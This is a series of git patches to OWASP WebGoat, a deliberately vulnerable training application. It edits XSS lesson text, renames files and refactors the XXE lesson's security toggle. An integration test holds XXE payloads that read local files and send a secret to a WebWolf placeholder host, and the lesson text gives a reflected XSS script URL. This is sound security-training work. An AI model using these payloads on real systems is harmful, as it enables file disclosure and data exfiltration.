-Your objective is to find the route and exploit it. First though ... what is the base route? As an example, look at the URL for this lesson ...
+Your objective is to find the route and exploit it. First though, what is the base route? As an example, look at the URL for this lesson ...
 it should look something like /WebGoat/start.mvc#lesson/CrossSiteScripting.lesson/9. The 'base route' in this case is:
 *start.mvc#lesson/*
 The *CrossSiteScripting.lesson/9* after that are parameters that are processed by the JavaScript route handler.
 
 So, what is the route for the test code that stayed in the app during production?
-To answer this question, you have to check the JavaScript source.
\ No newline at end of file
+To answer this question, you have to check the JavaScript source.
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6b.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6b.adoc
index 8bbecc6d0..425b5d865 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6b.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6b.adoc
@@ -1,11 +1,11 @@
 == Try It!   DOM-Based XSS
 
-Some attacks are "blind". Fortunately, you have the server running here so you will be able to tell if you are successful.
-Use the route you just found and see if you can use the fact that it reflects a parameter from the route without encoding to execute an internal function in WebGoat.
-The function you want to execute is ...
+Some attacks are "blind." Fortunately, you have the server running here, so you can tell if you are successful.
+Use the route you just found and see if you can use it to reflect a parameter from the route without encoding to execute an internal function in WebGoat.
+The function you want to execute is:
 
 *webgoat.customjs.phoneHome()*
 
-Sure, you could just use console/debug to trigger it, but you need to trigger it via a URL in a new tab.
+Sure, you could use console/debug to trigger it, but you need to trigger it via a URL in a new tab.
 
-Once you do trigger it, a subsequent response will come to your browser's console with a random number. Put that random number in below.
+Once you trigger it, a subsequent response will come to your browser's console with a random number. Put that random number below.
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7.adoc
index 0abda67c5..5e2283b64 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7.adoc
@@ -1,8 +1,8 @@
 == Stored XSS
-Stored Cross-Site Scripting is different in that the payload is persisted (stored) as opposed to passed/injected via a link.
+Stored Cross-Site Scripting is different in that the payload is persisted (stored) instead of passed/injected via a link.
 
 == Stored XSS Scenario
-* Attacker posts malicious script to a message board 
+* Attacker posts malicious script to a message board
 * Message is stored in a server database
 * Victim reads the message
 * The malicious script embedded in the message board post executes in the victim’s browser
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7b.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7b.adoc
index 66141dec2..9177f62fb 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7b.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7b.adoc
@@ -2,5 +2,5 @@ See the comments below.
 
 Add a comment with a JavaScript payload. Again ... you want to call the _webgoat.customjs.phoneHome_ function.
 
-As an attacker (offensive security), keep in mind that most apps are not going to have such a straight-forwardly named compromise.
-Also, you may have to find a way to load your own JavaScript dynamically to fully achieve goals of extracting data.
\ No newline at end of file
+As an attacker (offensive security), keep in mind that most apps will not have such a straightforwardly named compromise.
+Also, you may have to find a way to load your JavaScript dynamically to achieve the goal of extracting data fully.
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7c.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7c.adoc
index 35a567a5b..2ff962c7b 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7c.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7c.adoc
@@ -1,3 +1,3 @@
 Watching in your browser's developer tools or your proxy, the output should include a value starting with 'phoneHome Response is ...."
-Put that value in below to complete this exercise.  Note that, each subsequent call to the _phoneHome_ method will change that value.
-You may need to ensure you have the most recent one.
\ No newline at end of file
+Put that value below to complete this exercise.  Note that each subsequent call to the _phoneHome_ method will change that value.
+You may need to ensure you have the most recent one.
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8.adoc
index a06f449e8..acf83840a 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8.adoc
@@ -2,26 +2,26 @@
 
 
 === Why?
-Hopefully we have covered that by now. Bottom line, you do not want someone else's code running in the context of your users and their logged-in session
+Hopefully, we have covered that by now. Bottom line, you do not want someone else's code running in the context of your users and their logged-in session
 
 === What to encode?
-The basic premise of defending against XSS is *output encoding* any untrusted input that goes to the screen.
+The basic premise of defending against XSS is *output encoding* any untrusted input to the screen.
 That may be changing with more sophisticated attacks, but it is still the best defense we currently have. *AND* ... *context matters*
 
-Another word on 'untrusted input'. If in doubt, treat everything (even data you populated in your DB as untrusted).
-Sometimes data is shared across multiple systems and what you think is your data, may not have been created by you/your team.
+Another word on 'untrusted input.' If in doubt, treat everything (even data you populated in your DB as untrusted).
+Sometimes data is shared across multiple systems, and what you think is your data may not have been created by you/your team.
 
 === When/Where?
 Encode *as the data is sent to the browser* (not in your persisted data).  In the case of *Single Page Apps (SPA's), you will need to encode
-in the client*. Consult your framework/library for me details, but some resources will be  provided on the next page.
+in the client*. Consult your framework/library for details, but some resources will be provided on the next page.
 
 === How?
 
- * Encode as HTML Entities in HTML Body
- * Encode as HTML Entities in HTML Attribute
- * Encode for JavaScript if outputting user input to JavaScript (but think about that ... you are outputting user input into JavaScript on your page!!)
+* Encode as HTML Entities in HTML Body
+* Encode as HTML Entities in HTML Attribute
+* Encode for JavaScript if outputting user input to JavaScript (but think about that ... you are outputting user input into JavaScript on your page!!)
 
 *DO NOT* try to blacklist/negative filter on strings like '<script>' and so forth.
 
 
-...See the next page for some recommended resources and reading on defending against XSS
\ No newline at end of file
+...See the next page for some recommended resources and reading on defending against XSS
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8a.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8a.adoc
index 600082dea..f910046b8 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8a.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8a.adoc
@@ -1,10 +1,10 @@
 == What is encoding?
 
-Not trusting user input means validating data for type, length, format and range whenever it passes through a trust boundary,
-say from a web form to an application script, and then encoding it prior to redisplay in a dynamic page.
+Not trusting user input means validating data for type, length, format, and range whenever it passes through a trust boundary,
+say from a web form to an application script, then encode it before redisplay in a dynamic page.
 
 In practice, this means that you need to review every point on your site where user-supplied data is handled and processed and
-ensure that, before being passed back to the user, any values accepted from the client side are checked, filtered and encoded.
+ensure that, before being passed back to the user, any values accepted from the client side are checked, filtered, and encoded.
 
 Client-side validation cannot be relied upon, but user input can be forced down to a minimal alphanumeric set with server-side
 processing before being used by a web application in any way.
@@ -12,7 +12,7 @@ processing before being used by a web application in any way.
 == Escaping
 
 Escaping means that you convert (or mark) key characters of the data to prevent it from being interpreted in a dangerous context.
-In the case of HTML output, you need to convert the < and > characters (among others), to prevent any malicious code from rendering.
+In the case of HTML output, you need to convert the < and > characters (among others) to prevent any malicious code from rendering.
 Escaping these characters involves turning them into their entity equivalents \&lt; and \&gt;,
 which will not be interpreted as HTML tags by a browser.
 
@@ -20,21 +20,21 @@ which will not be interpreted as HTML tags by a browser.
 
 You need to encode special characters like "<" and ">" before they are redisplayed if they are received from user input.
 For example, encoding "<" and ">" ensures a browser will display <script> but not execute it.
-In conjunction to encoding, it is important that your web pages always define their character set so the browser will not interpret
+In conjunction with encoding, your web pages must always define their character set so the browser will not interpret
 special character encodings from other character sets.
 
-Cross site scripting attacks usually occur when you manage to sneak a script (usually javascript) onto someone else's website, where
+Cross-site scripting attacks usually occur when you manage to sneak a script (usually javascript) onto someone else's website, where
 it can run maliciously.
 
 === Relevant XML/HTML special characters
 
 |===
 |Char |Escape string |
-|<	|\&lt;|
-|>	|\&gt;|
-|"	|\&quot;|
-|'	|\&#x27;|
-|&	|\&amp;|
+|< |\&lt;|
+|> |\&gt;|
+|" |\&quot;|
+|' |\&#x27;|
+|& |\&amp;|
 |/  |\&#x2F;|
 
 |===
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8b.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8b.adoc
index 61d3387bc..e1936eb02 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8b.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8b.adoc
@@ -1,6 +1,6 @@
 == Reflective XSS
 
-See the HTML file below which passes data to a JSP file.
+See the HTML file below, which passes data to a JSP file.
 
 [source,html]
 -------------------------------------------------------
@@ -49,7 +49,7 @@ Here is the JSP file:
 
 
 As you can see the JSP file prints unfiltered user input which is never a good idea.
-You want people to accesses the page like this:
+You want people to access the page like this:
 
 ----
 http://hostname.com/mywebapp/main.jsp?first_name=John&last_name=Smith
@@ -62,7 +62,7 @@ http://hostname.com/mywebapp/main.jsp?first_name=<script>alert("XSS Test")</scri
 
 === It is your turn!
 
-Try to prevent this kind of XSS by escaping the url parameters in the JSP file:
+Try to prevent this kind of XSS by escaping the URL parameters in the JSP file:
 
 
 
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8c.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8c.adoc
index dd25dfbfa..57d4d425f 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8c.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8c.adoc
@@ -1,7 +1,7 @@
 == Stored XSS
-One way to prevent stored XSS is the usage of https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project[OWASP AntiSamy]. AntiSamy is able to produce a "clean" string based on a modifiable policy file.
+One way to prevent stored XSS is the usage of https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project[OWASP AntiSamy]. AntiSamy can produce a "clean" string based on an adjustable policy file.
 
-See the java class below which saves a comment into a database.
+See the java class below, which saves a comment into a database.
 
 [source,java]
 -------------------------------------------------------
@@ -27,7 +27,7 @@ public class MyCommentDAO {
 -------------------------------------------------------
 
 
-And here is a java class that is using the addComment function
+And here is a Java class that uses the addComment function
 
 [source,java]
 -------------------------------------------------------
@@ -43,7 +43,7 @@ public class AntiSamyController {
 }
 -------------------------------------------------------
 As you can see the Java file stores unfiltered user input into the database.
-You’ll have the whole malicious code stored in your database now.
+You have the whole malicious code stored in your database now.
 
-== It’s your turn!
-Try to prevent this kind of XSS by creating a clean string inside of the saveNewComment() function. Use the "antisamy-slashdot.xml" as policy file for this example:
\ No newline at end of file
+== It is your turn!
+Try to prevent this kind of XSS by creating a clean string inside the saveNewComment() function. Use the "antisamy-slashdot.xml" as a policy file for this example:
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content9.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content9.adoc
index 8fef01f97..67887e62b 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content9.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content9.adoc
@@ -1,7 +1,7 @@
 == XSS defense resources
 
 === Java OWASP Encoder
-Do not be bothered by the incubator status on this project, use it if you are doing Java web apps and want to defend against XSS, use this
+Do not be bothered by the incubator status on this project. Use it if you are doing Java web apps and defending against XSS. Use this
 link: https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
 
 === General XSS prevention Cheat Sheet
@@ -16,15 +16,15 @@ link https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
 
 === Javascript Framework Specifics
 
-Encoding in the client can be tricky. Here are some resources to help with that. If you do not see your framework below (e.g. Ember, React, ???) and would like to contribute or suggest something ...
+Encoding in the client can be tricky. Here are some resources to help with that. If you do not see your framework below (e.g., Ember, React, ???) and would like to contribute or suggest something
 stop by https://github.com/WebGoat/WebGoat and file an issue (preferably with some recommendations/links) or fork and submit a pull request.
 
 ==== jQuery
-be aware if you are using something like ...
+be aware if you are using something like:
 
 _$selector.html(userInputHere)_,
 
-...you are in danger. If you want to use that, ensure you are doing something more like:
+you are in danger. If you want to use that, ensure you are doing something more like:
 
 _$selector.html(someEncodeHtmlMethod(userInputHere))_
 
@@ -32,7 +32,7 @@ OR
 
 _$selector.*text*(someEncodeHtmlMethod(userInputHere))_
 
-...if you only want the text of what is output by the user (http://stackoverflow.com/questions/9735045/is-jquery-text-method-xss-safe#9735118)
+If you only want the text of what is output by the user (http://stackoverflow.com/questions/9735045/is-jquery-text-method-xss-safe#9735118)
 
 ==== Backbone.js
 (One character can make such a difference)
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_plan.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_plan.adoc
index a5c1f09f1..111c6f089 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_plan.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_plan.adoc
@@ -1,6 +1,6 @@
 == Concept 
 
-This lesson describes what Cross-Site Scripting (XSS) is and how it can be used to perform tasks that were not the original intent of the developer.
+This lesson describes what Cross-Site Scripting (XSS) is and how it can be used to perform tasks that were not the developer's original intent.
 
 == Goals
 
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonSolutions/en/CrossSiteScripting_solution.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonSolutions/en/CrossSiteScripting_solution.adoc
deleted file mode 100644
index a6293919c..000000000
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonSolutions/en/CrossSiteScripting_solution.adoc
+++ /dev/null
@@ -1,5 +0,0 @@
-= HTTP Basics 
- 
-== Solution 
-
-Solution goes here
\ No newline at end of file
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonSolutions/html/CrossSiteScripting.html b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonSolutions/html/CrossSiteScripting.html
deleted file mode 100644
index 42219764e..000000000
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonSolutions/html/CrossSiteScripting.html
+++ /dev/null
@@ -1,14 +0,0 @@
-<!DOCTYPE html>
-
-<html xmlns:th="http://www.thymeleaf.org">
-
-
-
-	<div class="lesson-page-wrapper">
-		<!-- reuse this block for each 'page' of content -->
-		<!-- include content here ... will be first page/tab  multiple -->
-		<div class="adoc-content" th:replace="doc:HttpBasics_solution.adoc"></div>
-	</div>
-
-
-</html>
\ No newline at end of file

From 1f1fb73f86892ed659affd911d6096214e22b9b1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 18 Dec 2021 18:06:32 +0100
Subject: [PATCH 118/227] Style fix (#1191)

* renamed README

* rename
---
 CREATE_RELEASE.MD => CREATE_RELEASE.md | 0
 README.MD => README.md                 | 0
 2 files changed, 0 insertions(+), 0 deletions(-)
 rename CREATE_RELEASE.MD => CREATE_RELEASE.md (100%)
 rename README.MD => README.md (100%)

diff --git a/CREATE_RELEASE.MD b/CREATE_RELEASE.md
similarity index 100%
rename from CREATE_RELEASE.MD
rename to CREATE_RELEASE.md
diff --git a/README.MD b/README.md
similarity index 100%
rename from README.MD
rename to README.md

From 705ec85f35c7ac2046fcccfdf549dcc25b82e707 Mon Sep 17 00:00:00 2001
From: "Zubcevic.com" <rene@zubcevic.com>
Date: Sat, 18 Dec 2021 11:21:52 +0100
Subject: [PATCH 119/227] openshift support

---
 docker/Dockerfile | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/docker/Dockerfile b/docker/Dockerfile
index 11ee7f65d..b0e63fe82 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -3,6 +3,8 @@ FROM eclipse-temurin:17_35-jdk-focal
 RUN apt-get update
 RUN useradd -ms /bin/bash webgoat
 RUN apt-get -y install apt-utils nginx
+RUN chgrp -R 0 /home/webgoat
+RUN chmod -R g=u /home/webgoat
 
 USER webgoat
 

From ac4b06f11b7a0a3e8ed25b13e5682e4adc26d2f8 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 19 Dec 2021 14:35:14 +0100
Subject: [PATCH 120/227] Move enabling security to WebGoat core and add
 resetting the lessons.

We can use it for more lessons and showcase how to apply security directly from the source code.

Resolves: #1176
---
 .../owasp/webgoat/service/SessionService.java | 61 +++++--------------
 .../org/owasp/webgoat/session/WebSession.java | 17 ++++--
 .../main/resources/i18n/messages.properties   |  4 +-
 .../test/java/org/owasp/webgoat/XXETest.java  | 21 +++++--
 .../webgoat/xxe/BlindSendFileAssignment.java  |  6 +-
 .../java/org/owasp/webgoat/xxe/Comments.java  |  4 +-
 .../webgoat/xxe/ContentTypeAssignment.java    |  6 +-
 .../java/org/owasp/webgoat/xxe/SimpleXXE.java | 31 +++-------
 .../main/java/org/owasp/webgoat/xxe/User.java |  9 ---
 .../xxe/src/main/resources/html/XXE.html      |  4 +-
 10 files changed, 60 insertions(+), 103 deletions(-)

diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/service/SessionService.java b/webgoat-container/src/main/java/org/owasp/webgoat/service/SessionService.java
index 5d0f4b3cc..e621270ce 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/SessionService.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/service/SessionService.java
@@ -6,57 +6,28 @@
 
 package org.owasp.webgoat.service;
 
+import lombok.RequiredArgsConstructor;
+import org.owasp.webgoat.i18n.Messages;
+import org.owasp.webgoat.session.WebSession;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpSession;
-import java.util.ArrayList;
-import java.util.Collections;
-import java.util.Date;
-import java.util.Enumeration;
-import java.util.List;
-
-/**
- * <p>SessionService class.</p>
- *
- * @author rlawson
- * @version $Id: $Id
- */
 @Controller
+@RequiredArgsConstructor
 public class SessionService {
 
-    /**
-     * Returns hints for current lesson
-     *
-     * @param session a {@link javax.servlet.http.HttpSession} object.
-     * @param request a {@link javax.servlet.http.HttpServletRequest} object.
-     * @return a {@link java.lang.String} object.
-     */
-    @RequestMapping(path = "/service/session.mvc", produces = "application/json")
-    public @ResponseBody
-    String showSession(HttpServletRequest request, HttpSession session) {
-        StringBuilder sb = new StringBuilder();
-        sb.append("id").append(" = ").append(session.getId()).append("\n");
-        sb.append("created").append(" = ").append(new Date(session.getCreationTime())).append("\n");
-        sb.append("last access").append(" = ").append(new Date(session.getLastAccessedTime())).append("\n");
-        sb.append("timeout (secs)").append(" = ").append(session.getMaxInactiveInterval()).append("\n");
-        sb.append("session from cookie?").append(" = ").append(request.isRequestedSessionIdFromCookie()).append("\n");
-        sb.append("session from url?").append(" = ").append(request.isRequestedSessionIdFromURL()).append("\n");
-        sb.append("=====================================\n");
-        // get attributes
-        List<String> attributes = new ArrayList<String>();
-        Enumeration keys = session.getAttributeNames();
-        while (keys.hasMoreElements()) {
-            String name = (String) keys.nextElement();
-            attributes.add(name);
-        }
-        Collections.sort(attributes);
-        for (String attribute : attributes) {
-            String value = session.getAttribute(attribute) + "";
-            sb.append(attribute).append(" = ").append(value).append("\n");
-        }
-        return sb.toString();
+    private final WebSession webSession;
+    private final RestartLessonService restartLessonService;
+    private final Messages messages;
+
+    @RequestMapping(path = "/service/enable-security.mvc", produces = "application/json")
+    @ResponseBody
+    public String applySecurity() {
+        webSession.toggleSecurity();
+        restartLessonService.restartLesson();
+
+        var msg = webSession.isSecurityEnabled() ? "security.enabled" : "security.disabled";
+        return messages.getMessage(msg);
     }
 }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java b/webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java
index 2cdba739c..d7a64984b 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java
@@ -5,8 +5,6 @@ import org.owasp.webgoat.users.WebGoatUser;
 import org.springframework.security.core.context.SecurityContextHolder;
 
 import java.io.Serializable;
-import java.sql.Connection;
-import java.sql.SQLException;
 
 /**
  * *************************************************************************************************
@@ -39,9 +37,10 @@ import java.sql.SQLException;
  */
 public class WebSession implements Serializable {
 
-	private static final long serialVersionUID = -4270066103101711560L;
-	private final WebGoatUser currentUser;
-    private Lesson currentLesson;
+    private static final long serialVersionUID = -4270066103101711560L;
+    private final WebGoatUser currentUser;
+    private transient Lesson currentLesson;
+    private boolean securityEnabled;
 
     public WebSession() {
         this.currentUser = (WebGoatUser) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
@@ -73,4 +72,12 @@ public class WebSession implements Serializable {
     public String getUserName() {
         return currentUser.getUsername();
     }
+
+    public void toggleSecurity() {
+        this.securityEnabled = !this.securityEnabled;
+    }
+
+    public boolean isSecurityEnabled() {
+        return securityEnabled;
+    }
 }
diff --git a/webgoat-container/src/main/resources/i18n/messages.properties b/webgoat-container/src/main/resources/i18n/messages.properties
index d58990c3e..0c76dea40 100644
--- a/webgoat-container/src/main/resources/i18n/messages.properties
+++ b/webgoat-container/src/main/resources/i18n/messages.properties
@@ -60,4 +60,6 @@ not.empty=This field is required.
 username.size=Please use between 6 and 10 characters.
 username.duplicate=User already exists.
 password.size=Password should at least contain 6 characters
-password.diff=The passwords do not match.
\ No newline at end of file
+password.diff=The passwords do not match.
+security.enabled=Security enabled, you can try the previous challenges and see the effect!
+security.disabled=Security enabled, you can try the previous challenges and see the effect!
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
index f06481591..5e5d3a0fb 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
@@ -12,10 +12,14 @@ import io.restassured.http.ContentType;
 
 public class XXETest extends IntegrationTest {
 
-    private static final String xxe3 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>";
-    private static final String xxe4 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>";
-    private static final String dtd7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!ENTITY % file SYSTEM \"file:SECRET\"><!ENTITY % all \"<!ENTITY send SYSTEM 'WEBWOLFURL?text=%file;'>\">%all;";
-    private static final String xxe7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM \"WEBWOLFURL/USERNAME/blind.dtd\">%remote;]><comment><text>test&send;</text></comment>";
+    private static final String xxe3 = """
+            <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;test</text></comment>""";
+    private static final String xxe4 = """
+            <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;test</text></comment>""";
+    private static final String dtd7 = """
+            <?xml version="1.0" encoding="UTF-8"?><!ENTITY % file SYSTEM "file:SECRET"><!ENTITY % all "<!ENTITY send SYSTEM 'WEBWOLFURL?text=%file;'>">%all;""";
+    private static final String xxe7 = """
+            <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "WEBWOLFURL/USERNAME/blind.dtd">%remote;]><comment><text>test&send;</text></comment>""";
 
     private String webGoatHomeDirectory;
     private String webwolfFileDir;
@@ -39,8 +43,13 @@ public class XXETest extends IntegrationTest {
         startLesson("XXE");
         webGoatHomeDirectory = getWebGoatServerPath();
         webwolfFileDir = getWebWolfServerPath();
-        RestAssured.given().when().relaxedHTTPSValidation()
-		.cookie("JSESSIONID", getWebGoatCookie()).get(url("/xxe/applysecurity"));
+        RestAssured.given()
+                .when()
+                .relaxedHTTPSValidation()
+                .cookie("JSESSIONID", getWebGoatCookie())
+                .get(url("service/enable-security.mvc"))
+                .then()
+                .statusCode(200);
         checkAssignment(url("/WebGoat/xxe/simple"), ContentType.XML, xxe3, false);
         checkAssignment(url("/WebGoat/xxe/content-type"), ContentType.XML, xxe4, false);
         checkAssignment(url("/WebGoat/xxe/blind"), ContentType.XML, "<comment><text>" + getSecret() + "</text></comment>", false);
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/BlindSendFileAssignment.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/BlindSendFileAssignment.java
index f18bb83ba..17f3b813a 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/BlindSendFileAssignment.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/BlindSendFileAssignment.java
@@ -83,11 +83,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
         }
 
         try {
-        	boolean secure = false;
-        	if (null != request.getSession().getAttribute("applySecurity")) {
-        		secure = true;
-        	}
-            Comment comment = comments.parseXml(commentStr, secure);
+            Comment comment = comments.parseXml(commentStr);
             if (CONTENTS.contains(comment.getText())) {
                 comment.setText("Nice try, you need to send the file to WebWolf");
             }
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Comments.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Comments.java
index a86cbd6be..fb985b4c9 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Comments.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Comments.java
@@ -89,11 +89,11 @@ public class Comments {
      * XmlMapper bean defined above will be used automatically and the Comment class can be directly used in the
      * controller method (instead of a String)
      */
-    protected Comment parseXml(String xml, boolean secure) throws JAXBException, XMLStreamException {
+    protected Comment parseXml(String xml) throws JAXBException, XMLStreamException {
         var jc = JAXBContext.newInstance(Comment.class);
         var xif = XMLInputFactory.newInstance();
         
-        if (secure) {
+        if (webSession.isSecurityEnabled()) {
         	xif.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
         	xif.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");  // compliant
         }
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/ContentTypeAssignment.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/ContentTypeAssignment.java
index 4283c2895..052dbe772 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/ContentTypeAssignment.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/ContentTypeAssignment.java
@@ -68,11 +68,7 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
         if (null != contentType && contentType.contains(MediaType.APPLICATION_XML_VALUE)) {
             String error = "";
             try {
-                boolean secure = false;
-                if (null != request.getSession().getAttribute("applySecurity")) {
-                    secure = true;
-                }
-                Comment comment = comments.parseXml(commentStr, secure);
+                Comment comment = comments.parseXml(commentStr);
                 comments.addComment(comment, false);
                 if (checkSolution(comment)) {
                     attackResult = success(this).build();
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java
index c46b0504a..f77eb5d07 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java
@@ -30,7 +30,6 @@ import org.owasp.webgoat.assignments.AttackResult;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.MediaType;
-import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.RequestMapping;
@@ -66,15 +65,10 @@ public class SimpleXXE extends AssignmentEndpoint {
 
     @PostMapping(path = "xxe/simple", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
